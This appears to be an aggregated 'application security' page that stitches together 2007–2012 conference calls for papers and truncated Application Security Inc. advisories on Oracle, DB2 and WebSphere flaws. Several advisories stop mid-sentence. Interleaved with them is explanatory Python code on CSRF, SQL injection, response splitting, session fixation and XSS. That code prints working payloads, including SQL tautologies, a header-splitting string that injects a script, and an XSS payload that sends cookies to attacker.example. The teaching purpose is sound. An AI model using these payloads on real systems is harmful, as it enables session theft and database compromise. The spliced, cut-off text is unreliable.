application security
There will be training courses on November 24, followed by plenary sessions on the 25th and 26th with multiple tracks per day.
We are seeking training proposals on the following topics (in no particular order):
- Application Threat Modeling
- Business Risks with Application Security
- Hands-on Source Code Review
- Metrics for Application Security
- OWASP Tools and Projects
- Privacy Concerns with Applications and Data Storage
- Secure Coding Practices (J2EE/.NET)
On Wed, Oct 12, 2011 at 9:43 AM, AppSec DC <cfp@appsecdc.org> wrote:
>
> Colleagues,
>
> Building on the success of AppSec DC 2010 and 2009, OWASP is pleased to announce the next OWASP AppSec DC conference. The theme for this year's conference is "OWASP - Not just webapps anymore" to reflect the new and revised scope of OWASP to include all application security issues instead of focusing just on web application security.
>
> Owing to feedback from the past two years, and in alignment with the overall OWASP Conference mission, the AppSec DC Planners have decided to move the conference to April of 2012. This is in response to requests from a variety of our sponsors and vendors, and de-conflicts overlap in the OWASP conference schedule for North America. OWASP AppSec DC 2012 will be held at the Walter E. Washington Convention Center on April 2nd through April 5th. Plenary sessions will be on April 4th and 5th preceded by Application Security Training on April 2nd and 3rd.
>
> In accordance with the broader OWASP mission stemming from the 2011 OWASP Global Summit, AppSec DC is working to reflect the move of OWASP towards embracing all facets of Application Security, and not restricting its content strictly to the realm of web applications. Therefore we invite all practitioners of application security and those who work with or interact with all facets of application security to submit papers and participate in the conference.
>
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Ariel Sanchez of
Application Security Inc.
Details:
Buffer overflow in the sysproc.auth_list_groups_for_authid function. By
passing an overly long value of more than 40 bytes to the
auth_list_groups_for_authid function, a stack-based buffer can be
Remote exploitable:
Yes (Authentication to Database Server is needed)
Credits:
This vulnerability was discovered and researched by Esteban Martínez
Fayó of Application Security Inc.
Details:
Oracle Database Server provides the SYS.DBMS_AQADM_SYS package that is
used internally by the SYS.DBMS_AQADM package to provide procedures to
manage Oracle Streams Advanced Queuing (AQ) configuration and
Remote exploitable:
Yes (Authentication to Database Server is needed)
Credits:
This vulnerability was discovered and researched by Esteban Martínez
Fayó of Application Security Inc.
Details:
Oracle Database Server provides the MDSYS.SDO_CS package that contains
subprograms for working with coordinate systems. This package contains
the function TRANSFORM which is vulnerable to buffer overflow attacks.
'FORM', making the application vulnerable to Cross-Site Request Forgery.
The vulnerable areas of the WebSphere administrative console include the
'Security > Global Security' panel [6] and the 'Save changes to the
master configuration' feature. This makes it possible for a remote attacker
to disable the 'Administrative Security', 'Application Security' and
'Java 2 Security' options, and then save the changes to the
configuration, by tricking an IBM WebSphere administrator who is
currently logged in to the administrative console into visiting a malicious
web page. Also note that IBM WebSphere 7.0 with Fix Pack 11 did not
include a 'csrfid' token for the 'Save changes to the master
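The missing 'csrfid' token is the whole story here: the console trusted any POST that arrived with the administrator's session cookie, and a cross-site page can make the browser send exactly that. The following is an added illustration (not WebSphere code, and not from the advisory) of a synchronizer-token check for a 'save configuration' handler; the session and form are plain dicts, and the field names adminSecurity and csrfid are assumed stand-ins for the real console's parameters.

```python
import hmac
import secrets

# Constructed stand-in for the console's 'save to master configuration'
# handler. session and form are plain dicts, not WebSphere's real objects,
# and the field names are assumptions for the example.

def issue_csrf_token(session):
    """Called when the legitimate page is rendered: bind a token to the session."""
    token = secrets.token_hex(16)
    session["csrfid"] = token
    return token

def save_config_vulnerable(session, form):
    """Accepts any POST from an authenticated browser: no proof of origin."""
    if not session.get("user"):
        return 403
    session["admin_security"] = form.get("adminSecurity") == "on"
    return 200

def save_config_safe(session, form):
    """Same handler, but the POST must carry the token the session issued."""
    if not session.get("user"):
        return 403
    expected = session.get("csrfid")
    supplied = form.get("csrfid", "")
    # constant-time compare; a missing or foreign token is rejected
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403
    session["admin_security"] = form.get("adminSecurity") == "on"
    return 200

def cross_site_attack(handler):
    """Admin is logged in with Administrative Security on; attacker's page
    auto-submits a POST. The browser attaches the admin's cookies, but the
    attacker cannot read the token, so the forged form carries none."""
    session = {"user": "wasadmin", "admin_security": True}
    issue_csrf_token(session)              # the real console page had a token
    forged_form = {"adminSecurity": "off"}
    status = handler(session, forged_form)
    return status, session["admin_security"]

def legitimate_save(handler):
    """The admin's own form, rendered with the token, still works."""
    session = {"user": "wasadmin", "admin_security": True}
    token = issue_csrf_token(session)
    form = {"adminSecurity": "off", "csrfid": token}
    return handler(session, form), session["admin_security"]
```

Against the unprotected handler the forged POST returns 200 and Administrative Security ends up disabled; against the token-checking handler it returns 403 and the setting is untouched, while the admin's genuine form is still accepted. The token must be unguessable and tied to the session, not a static value, or the check is no better than none.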
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Martin Rakhmanov of
Application Security Inc.
Details:
The RESTORE DATABASE command is vulnerable to SQL injection, allowing
malicious users to run SQL code with the highest privileges.
To exploit this vulnerability an attacker must possess CREATE DATABASE
Remote exploitable:
Yes (Authentication is needed)
Credits:
This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc.
Details:
SQL Injection works by attempting to modify the parameters passed to an application to change the SQL statements that are passed to a database. SQL injection can be used to insert additional SQL statements to be executed.
The 'Type', 'snapshot' and 'table' parameters used in web page /em/console/ecm/history/configHistory and 'fConfigGuid' parameter used in /em/console/ecm/config/compare/compareWizSecondConfig are vulnerable to SQL Injection attacks. These web pages are part of Oracle Enterprise Manager web application. It may be possible for a malicious user to execute a function with the elevated privileges of the SYSMAN database user in the repository database. This user has the DBA role granted.
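To make the mechanism concrete, here is an added example (not from the advisory and not Oracle Enterprise Manager's code) of the same class of bug: a parameter such as 'snapshot' spliced into the statement text, beside the bind-variable version. The table, rows and column names are constructed for the example; SQLite stands in for the repository database, so the privilege escalation to SYSMAN is not reproduced, only the query manipulation.

```python
import sqlite3

def build_repository():
    """Constructed stand-in for the repository; not the real SYSMAN schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE config_history (snapshot TEXT, type TEXT, owner TEXT)")
    conn.executemany("INSERT INTO config_history VALUES (?, ?, ?)", [
        ("snap-001", "db", "alice"),
        ("snap-002", "db", "alice"),
        ("snap-900", "host", "sysman"),   # a row alice should never be shown
    ])
    return conn

def history_vulnerable(conn, snapshot, owner="alice"):
    """The 'snapshot' parameter is spliced into the statement text."""
    sql = ("SELECT snapshot, owner FROM config_history "
           "WHERE owner = '%s' AND snapshot = '%s'" % (owner, snapshot))
    return conn.execute(sql).fetchall()

def history_safe(conn, snapshot, owner="alice"):
    """Same query with bind variables: the input can only ever be a value."""
    sql = ("SELECT snapshot, owner FROM config_history "
           "WHERE owner = ? AND snapshot = ?")
    return conn.execute(sql, (owner, snapshot)).fetchall()

# Constructed payloads for the 'snapshot' parameter.
# AND binds tighter than OR, so the owner filter is defeated in both cases.
TAUTOLOGY = "x' OR '1'='1"             # every row, regardless of owner
COMMENT_OUT = "x' OR type = 'host'--"  # comments out the closing quote,
                                       # returns only the sysman row
```

Calling history_vulnerable with TAUTOLOGY returns all three rows and COMMENT_OUT returns just the sysman row, while history_safe returns nothing for either payload because the whole string is compared as a literal. In Oracle the same technique reaches further: a function call injected this way runs with the privileges of the user the web tier connects as, which is why a DBA-role repository account turns an input-handling bug into full database compromise.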
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
HTTP Response Splitting is a web application vulnerability where input
parameters are unsafely used in response headers allowing an attacker to
make the server print one (or more) new line sequences in the header
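As an added illustration of the header-injection mechanism just described (example code, not from the advisory or Oracle's product), the following builds a redirect whose Location header echoes a request parameter, then splits the result the way a client would. The lang parameter, the /index path and the payload are constructed for the example.

```python
from urllib.parse import unquote

def redirect_vulnerable(lang_param):
    """Decodes the parameter and places it in a header unchanged (the flaw)."""
    lang = unquote(lang_param)
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /index?lang=" + lang + "\r\n"
            "Content-Length: 0\r\n"
            "\r\n")

def redirect_safe(lang_param):
    """Same header, but CR and LF are refused before the value is used."""
    lang = unquote(lang_param)
    if "\r" in lang or "\n" in lang:
        raise ValueError("CR/LF in header value")
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /index?lang=" + lang + "\r\n"
            "Content-Length: 0\r\n"
            "\r\n")

def first_response(raw):
    """Split a raw response as a client does: status line, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *headers = head.split("\r\n")
    return status, headers, body

# Constructed payload: URL-encoded CR/LF (%0d%0a) terminates the 302 early
# and appends a second, attacker-authored 200 response carrying a script.
SCRIPT = "<script>alert(document.cookie)</script>"
PAYLOAD = ("en%0d%0aContent-Length:%200%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
           "Content-Length:%20" + str(len(SCRIPT)) + "%0d%0a%0d%0a" + SCRIPT)
```

With the vulnerable builder, first_response shows the 302 ending after the injected Content-Length: 0 and the body beginning with a complete second response; a client or cache that reads the next message from the same connection serves the attacker's page. The safe builder raises on the same input. Rejecting CR/LF outright is preferable to stripping it, because stripping can silently turn one bad value into another.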
Remote exploitable:
Yes (No authentication is required)
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
Oracle Database provides OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, this is because it can be used for
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
SQL Injection works by attempting to modify the parameters passed to an
application to change the SQL statements that are passed to a database.
SQL injection can be used to insert additional SQL statements to be
Finally, there is a public ModSecurity course you can attend!
As part of the upcoming OWASP/WASC AppSec 2007 conference in San Jose,
Ryan Barnett is going to give a two day ModSecurity Boot-Camp Training
course on Nov 12th and 13th. For those of you who don't know Ryan, he is
ModSecurity Community Manager and Director of Application Security
Training at Breach Security, and one of the best ModSecurity experts out
there.
As an additional bonus, Ivan Ristic, the creator of ModSecurity, will
also be in attendance for portions of the class. So, if you ever wanted
Oracle Enterprise Manager control included in Oracle Database versions 10.1.0.5, 10.2.0.3, 10.2.0.4
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security, Inc.
Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.
There are instances of XSS vulnerabilities in the Event Management component of Oracle Enterprise Manager Grid Control. For example, the 'value' parameter of the /em/console/pref/notifRuleInfo$mode web page is vulnerable to this kind of attack.
Hi everyone,
We're happy to announce that the sixth annual SANS AppSec Summit will be
held in Las Vegas, Nevada on April 30 - May 1, 2012.
The theme for this conference is "Application Security at Scale".
Billions of records in the cloud. Millions of smart mobile devices.
Millions of developers writing new code. Hundreds of apps in your
enterprise. Untold numbers of existing bugs. Unknown numbers of
"sophisticated" attackers exploiting your software. What cutting edge
Oracle Enterprise Manager control included in Oracle Database versions 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, 11.2.0.2
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security, Inc.
Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.
There are instances of XSS vulnerabilities in the Instance Management component of Oracle Enterprise Manager Grid Control. For example, the 'commentinput' parameter of the /em/console/database/monitoring/metricDetail$type web page is vulnerable to this kind of attack.
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.
Details:
Authenticating a web user without invalidating any existing session
identifier gives an attacker the opportunity to steal authenticated
sessions.
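This is session fixation. An added example (not the product's code, not from the advisory) with a toy in-memory session store shows why keeping the pre-authentication identifier is enough for the attacker: he obtains a valid anonymous id, plants it in the victim's browser, and waits for the victim to log in with it. The user table and password are constructed.

```python
import secrets

class SessionStore:
    """Constructed in-memory session table standing in for the application's."""
    def __init__(self):
        self.sessions = {}

    def new_anonymous(self):
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid):
        return self.sessions.get(sid, {}).get("user")

USERS = {"victim": "correct horse"}  # constructed credential table

def check_password(username, password):
    return secrets.compare_digest(USERS.get(username, ""), password)

def login_vulnerable(store, sid, username, password):
    """Authenticates but keeps whatever session id the request carried."""
    if not check_password(username, password):
        return None
    store.sessions.setdefault(sid, {})["user"] = username
    return sid

def login_safe(store, sid, username, password):
    """Same check; the pre-auth id is invalidated and a fresh one issued."""
    if not check_password(username, password):
        return None
    store.sessions.pop(sid, None)          # the id the attacker knows dies here
    new_sid = secrets.token_urlsafe(32)
    store.sessions[new_sid] = {"user": username}
    return new_sid

def fixation_scenario(login):
    """Returns (user the attacker's id now maps to, whether the id was rotated)."""
    store = SessionStore()
    attacker_sid = store.new_anonymous()   # attacker fetches a valid pre-auth id
    # ... and plants it in the victim's browser (cookie injection, crafted link)
    post_login_sid = login(store, attacker_sid, "victim", "correct horse")
    # attacker replays the id he planted
    return store.user_for(attacker_sid), post_login_sid != attacker_sid
```

With login_vulnerable the planted id is now an authenticated session for "victim"; with login_safe it maps to nothing and only the freshly issued id carries the login. Rotating the identifier on every privilege change, not just at login, closes the same hole for step-up authentication.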
The call for papers ends in seven days, on February 1, 2012, so submit today!
Oracle Enterprise Manager control included in Oracle Database versions 10.1.0.5, 10.2.0.3, 10.2.0.4, 11.1.0.7
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Esteban Martinez Fayo of Application Security, Inc.
Details:
Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user.
There are instances of XSS vulnerabilities in the Instance Management component of Oracle Enterprise Manager Grid Control. For example, the 'datasource' parameter of the /em/console/database/instance/sitemap web page is vulnerable to this kind of attack.
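The three Enterprise Manager XSS advisories above ('value', 'commentinput' and 'datasource') all describe the same reflection pattern. As an added example, not from the advisories or Oracle's code, the following shows a page that echoes a parameter into a form attribute, the context-appropriate escaping that fixes it, and the probe a tester uses to confirm the reflection; the page template and payload are constructed.

```python
import html
from urllib.parse import parse_qs, quote

def render_vulnerable(query_string):
    """Echoes the decoded 'value' parameter straight into an attribute."""
    value = parse_qs(query_string).get("value", [""])[0]
    return '<input type="text" name="value" value="%s">' % value

def render_safe(query_string):
    """quote=True also escapes " and ', so the value cannot close the attribute."""
    value = parse_qs(query_string).get("value", [""])[0]
    return '<input type="text" name="value" value="%s">' % html.escape(value, quote=True)

# Constructed attacker parameter, URL-encoded as it travels in a crafted link:
# closes the attribute and the tag, then exfiltrates the cookie.
PAYLOAD = ('"><script>document.location="http://attacker.example/?c="'
           '+document.cookie</script>')
CRAFTED_QUERY = "value=" + quote(PAYLOAD, safe="")

def is_reflected_unescaped(page, marker='"><script>'):
    """Tester's probe: does the raw breakout marker survive into the response?"""
    return marker in page
```

The vulnerable renderer returns the script intact inside the page, so it runs in the application's origin with access to its cookies; the safe renderer returns it as &quot;&gt;&lt;script&gt;..., inert text. Escaping must match the output context (attribute, element body, JavaScript, URL); html.escape covers the first two only.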
> OWASP is currently soliciting training providers for the OWASP AppSec DC
> 2012 regional conference that will take place at the Walter E. Washington
> Convention Center (801 Mount Vernon Place NW Washington, DC 20001) on April
> 2nd through 5th of 2012. The theme for this year's conference is "OWASP -
> Not just webapps anymore" to reflect the new and revised scope of OWASP to
> include all application security issues instead of focusing just on web
> application security. There will be training courses on April 2nd and 3rd
> followed by plenary sessions on the 4th and 5th. There are a total of six
> classrooms over two days or 12 training days available at the conference.
> Three classrooms hold 30 students and the other three have a capacity of 24
> students.
BLACK HAT WASHINGTON DC CFP NOW OPEN
Held February 16-19, 2009 at the Hyatt Regency Crystal City. Black Hat DC is
the leading security conference focused on the needs of government and
infrastructure security professionals, with tracks focused on Hardware and
Embedded Devices, Reverse Engineering and Malware, Client Wars and
Application Security, and Forensics and Network Protection. We hope to see
you there for another highly technical and refreshingly vendor-neutral
event.
Submitters will have until January 1 to get their papers into the Black Hat
CFP system at:
Hope to see you in Vegas!
Remote exploitable:
Yes (Authentication to Database Server is needed)
Credits:
This vulnerability was discovered and researched by Esteban Martínez
Fayó of Application Security Inc.
Details:
Oracle Database Server provides the SYS.DBMS_AQJMS_INTERNAL package.
This package contains the procedures AQ$_REGISTER and AQ$_UNREGISTER
which are vulnerable to buffer overflow attacks.
Remote exploitable:
Yes (Authentication to Database Server is needed)
Credits:
These vulnerabilities were discovered and researched by Ariel Sanchez of
Application Security Inc.
Details:
DB2 has multiple vulnerabilities which can lead to Denial of Service
(DoS) attacks against the instance. When RECOVERJAR and REMOVE_JAR
procedures are called with a specially crafted parameter the DB2